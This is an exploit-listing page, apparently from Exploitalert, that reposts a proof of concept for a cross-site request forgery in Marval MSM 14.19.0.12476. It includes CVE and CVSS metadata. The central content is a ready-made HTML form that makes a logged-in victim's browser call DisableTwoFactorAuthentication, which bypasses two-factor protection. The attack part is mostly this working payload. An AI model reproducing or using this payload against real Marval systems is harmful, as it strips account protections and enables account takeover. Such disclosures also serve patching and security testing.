Advertisement






Marval MSM 14.19.0.12476 Cross Site Request Forgery

CVE Category Price Severity
CVE-XXXX-XXXX CWE-352 $5,000 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2022-06-20
CPE
cpe:cpe:/a:marval:msm:14.19.0.12476
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 0.231 0.24

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022060061

Below is a copy:

Marval MSM 14.19.0.12476 Cross Site Request Forgery
# Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
# Date: 27/5/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.marvalnorthamerica.com/
# Software Link: https://www.marvalnorthamerica.com/
# Version: v14.19.0.12476
# Tested on: Windows
# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY
# 2FA Bypass:

<html>

  <body>
    <form action="https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptHandler.ashx?method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx&classMode=WXr8G2r3eh3984wn3YQvtybzSUW%2B955Uiq5AACvfimwA%2FNZHYRFm8%2Bgidv5CcNfjtLsElRbK%2FRmwvfE9UfeyD6DseGEe5eZGWB32FOJrhdcEh7oNUSSO9Q%3D%3D" method="POST" enctype="text/plain">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.